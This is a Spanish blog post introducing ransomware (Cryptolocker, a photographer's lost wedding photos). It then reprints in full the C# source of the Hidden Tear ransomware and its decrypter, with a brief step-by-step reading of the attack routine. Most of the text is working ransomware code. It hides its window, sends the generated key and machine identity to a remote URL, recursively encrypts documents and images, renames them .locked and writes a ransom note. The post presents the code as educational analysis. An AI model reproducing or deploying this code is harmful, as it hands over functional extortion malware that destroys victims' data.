Un ransomware es un programa malicioso que cifra partes o todo el sistema de su víctima exigiendo un rescate económico a cambio. Y es que hay gente que se dedica profesionalmente al secuestro digital. Hay empresas que han tenido que cerrar e incluso algún adolescente se ha llegado a suicidar. Hace unos meses apareció la noticia de que un fotógrafo tenía que indemnizar con 8.000€ a una pareja de recién casados por haber perdido las fotos de su boda. El juez estimó que debía de indemnizar con esta cuantía económica para repetir el reportaje más las costas del proceso. Imagina lo que supone para un fotógrafo autónomo perder el material que almacena en su equipo. Y la importancia que tienen las copias de seguridad en caso de verse infectado por uno de estos programas maliciosos.
Algunos de los ransomware más famosos en los últimos tiempos han sido Cryptolocker y Cryptowall. El sistema es sencillo, una vez infecta el sistema a través de normalmente un phising, se genera un par de claves pública y privada en caso de utilizar un algoritmo de cifrado asimétrico o una clave privada en el caso de utilizar un cifrado simétrico. A continuación se cifra el sistema con el algoritmo que corresponda (AES, RSA, etc.) y se envía la clave privada a un servidor externo. Por último se muestra un mensaje en el que se pide un pago para obtener la clave privada capaz de descifrar los archivos.
Mensaje de Cryptolocker
Según el tipo de ransomware varía la cuantía llegando hasta los 2.000€ en algunas ocasiones. El pago se suele solicitar en bitcoins o en prepago. En el caso de Cryptolocker antes de la detener a uno de los implicados, Evgeniy Bogachev, y dar de baja el malware, había conseguido generar 3 millones de dólares.
Variante de Cryptolocker
Hace unos días un grupo de hackers Turco ha publicado el código fuente de un ransomware llamado Hidden Tear con fines educativos.
Pasemos a analizarlo.
El cliente encargado de cifrar:
/*
_ _ _ _ _
| | (_) | | | | | |
| |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __
| '_ \| |/ _` |/ _` |/ _ \ '_ \ | __/ _ \/ _` | '__|
| | | | | (_| | (_| | __/ | | | | || __/ (_| | |
|_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_|
* Coded by Utku Sen(Jani) / August 2015 Istanbul / utkusen.com
* hidden tear may be used only for Educational Purposes. Do not use it as a ransomware!
* You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.
*
* Ve durdu saatler
* Susuyor seni zaman
* Sesin dondu kulagimda
* Dedi uykudan uyan
*
* Yine boyle bir aksamdi
* Sen guluyordun ya gozlerimin icine
* Feslegenler boy vermisti
* Gokten parlak bir yildiz dustu pesine
* Sakladim gozyaslarimi
*/
using System;
using System.Diagnostics;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Security;
using System.Security.Cryptography;
using System.IO;
using System.Net;
using Microsoft.Win32;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
namespace hidden_tear
{
public partial class Form1 : Form
{
//Url to send encryption password and computer info
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
string userName = Environment.UserName;
string computerName = System.Environment.MachineName.ToString();
string userDir = "C:\\Users\\";
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
Opacity = 0;
this.ShowInTaskbar = false;
//starts encryption at form load
startAction();
}
private void Form_Shown(object sender, EventArgs e)
{
Visible = false;
Opacity = 100;
}
//AES encryption algorithm
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
{
byte[] encryptedBytes = null;
byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
using (MemoryStream ms = new MemoryStream())
{
using (RijndaelManaged AES = new RijndaelManaged())
{
AES.KeySize = 256;
AES.BlockSize = 128;
var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
AES.Key = key.GetBytes(AES.KeySize / 8);
AES.IV = key.GetBytes(AES.BlockSize / 8);
AES.Mode = CipherMode.CBC;
using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
{
cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
cs.Close();
}
encryptedBytes = ms.ToArray();
}
}
return encryptedBytes;
}
//creates random password for encryption
public string CreatePassword(int length)
{
const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
StringBuilder res = new StringBuilder();
Random rnd = new Random();
while (0 < length--){
res.Append(valid[rnd.Next(valid.Length)]);
}
return res.ToString();
}
//Sends created password target location
public void SendPassword(string password){
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
}
//Encrypts single file
public void EncryptFile(string file, string password)
{
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
// Hash the password with SHA256
passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
File.WriteAllBytes(file, bytesEncrypted);
System.IO.File.Move(file, file+".locked");
}
//encrypts target directory
public void encryptDirectory(string location, string password)
{
//extensions to be encrypt
var validExtensions = new[]
{
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
};
string[] files = Directory.GetFiles(location);
string[] childDirectories = Directory.GetDirectories(location);
for (int i = 0; i < files.Length; i++){
string extension = Path.GetExtension(files[i]);
if (validExtensions.Contains(extension))
{
EncryptFile(files[i],password);
}
}
for (int i = 0; i < childDirectories.Length; i++){
encryptDirectory(childDirectories[i],password);
}
}
public void startAction()
{
string password = CreatePassword(15);
string path = "\\Desktop\\test";
string startPath = userDir + userName + path;
SendPassword(password);
encryptDirectory(startPath,password);
messageCreator();
password = null;
System.Windows.Forms.Application.Exit();
}
public void messageCreator()
{
string path = "\\Desktop\\test\\READ_IT.txt";
string fullpath = userDir + userName + path;
string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." };
System.IO.File.WriteAllLines(fullpath, lines);
}
}
}
Viendo el procedimiento startAction a partir de la línea 172 enseguida vemos el funcionamiento.
174. Generar contraseña.
177. Enviar contraseña.
178. Cifrar.
179. Pedir rescate.
180. Eliminar contraseña en el cliente.
Por el otro lado el código de descifrado:
/*
_ _ _ _ _
| | (_) | | | | | |
| |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __
| '_ \| |/ _` |/ _` |/ _ \ '_ \ | __/ _ \/ _` | '__|
| | | | | (_| | (_| | __/ | | | | || __/ (_| | |
|_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_|
* Coded by Utku Sen(Jani) / August 2015 Istanbul / utkusen.com
* hidden tear may be used only for Educational Purposes. Do not use it as a ransomware!
* You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.
*/
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Security;
using System.Security.Cryptography;
using System.IO;
using System.Net;
using Microsoft.Win32;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
namespace hidden_tear_decrypter
{
public partial class Form1 : Form
{
string userName = Environment.UserName;
string userDir = "C:\\Users\\";
public Form1()
{
InitializeComponent();
}
public byte[] AES_Decrypt(byte[] bytesToBeDecrypted, byte[] passwordBytes)
{
byte[] decryptedBytes = null;
// Set your salt here, change it to meet your flavor:
// The salt bytes must be at least 8 bytes.
byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
using (MemoryStream ms = new MemoryStream())
{
using (RijndaelManaged AES = new RijndaelManaged())
{
AES.KeySize = 256;
AES.BlockSize = 128;
var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
AES.Key = key.GetBytes(AES.KeySize / 8);
AES.IV = key.GetBytes(AES.BlockSize / 8);
AES.Mode = CipherMode.CBC;
using (var cs = new CryptoStream(ms, AES.CreateDecryptor(), CryptoStreamMode.Write))
{
cs.Write(bytesToBeDecrypted, 0, bytesToBeDecrypted.Length);
cs.Close();
}
decryptedBytes = ms.ToArray();
}
}
return decryptedBytes;
}
public void DecryptFile(string file,string password)
{
byte[] bytesToBeDecrypted = File.ReadAllBytes(file);
byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
byte[] bytesDecrypted = AES_Decrypt(bytesToBeDecrypted, passwordBytes);
File.WriteAllBytes(file, bytesDecrypted);
string extension = System.IO.Path.GetExtension(file);
string result = file.Substring(0, file.Length - extension.Length);
System.IO.File.Move(file, result);
}
public void DecryptDirectory(string location)
{
string password = textBox1.Text;
string[] files = Directory.GetFiles(location);
string[] childDirectories = Directory.GetDirectories(location);
for (int i = 0; i < files.Length; i++)
{
string extension = Path.GetExtension(files[i]);
if (extension == ".locked")
{
DecryptFile(files[i], password);
}
}
for (int i = 0; i < childDirectories.Length; i++)
{
DecryptDirectory(childDirectories[i]);
}
label3.Visible = true;
}
private void button1_Click(object sender, EventArgs e)
{
string path = "\\Desktop";
string fullpath = userDir + userName + path;
DecryptDirectory(fullpath);
}
private void Form1_Load(object sender, EventArgs e)
{
}
}
}
En esta demostración únicamente introducimos la contraseña en una caja de texto y pulsando el botón desciframos el contenido.